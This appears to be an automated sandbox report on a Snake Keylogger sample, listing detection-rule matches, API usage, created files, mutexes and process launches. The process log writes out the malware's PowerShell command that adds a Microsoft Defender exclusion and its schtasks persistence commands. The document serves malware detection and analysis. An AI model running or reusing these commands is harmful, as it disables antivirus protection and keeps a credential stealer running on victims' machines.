Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: pedido.pif.exe PID: 5188, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RePUtenbQjvc.exe PID: 5040, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: pedido.pif.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RePUtenbQjvc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.AddAccessRule
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.AddAccessRule
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.AddAccessRule
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.SetAccessControl
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	Security API names: _0020.AddAccessRule
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/11@2/3

Source: C:\Users\user\Desktop\pedido.pif.exe

File created: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSuQNZvFCZbhvNfxViTKXGqHfFW
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03

Source: C:\Users\user\Desktop\pedido.pif.exe

File created: C:\Users\user\AppData\Local\Temp\tmp30EC.tmp

Jump to behavior

Source: pedido.pif.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: pedido.pif.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\pedido.pif.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pedido.pif.exe, 00000007.00000002.3879147129.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002CAE000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: pedido.pif.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\pedido.pif.exe

File read: C:\Users\user\Desktop\pedido.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pedido.pif.exe "C:\Users\user\Desktop\pedido.pif.exe"
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Users\user\Desktop\pedido.pif.exe "C:\Users\user\Desktop\pedido.pif.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process created: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Users\user\Desktop\pedido.pif.exe "C:\Users\user\Desktop\pedido.pif.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process created: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
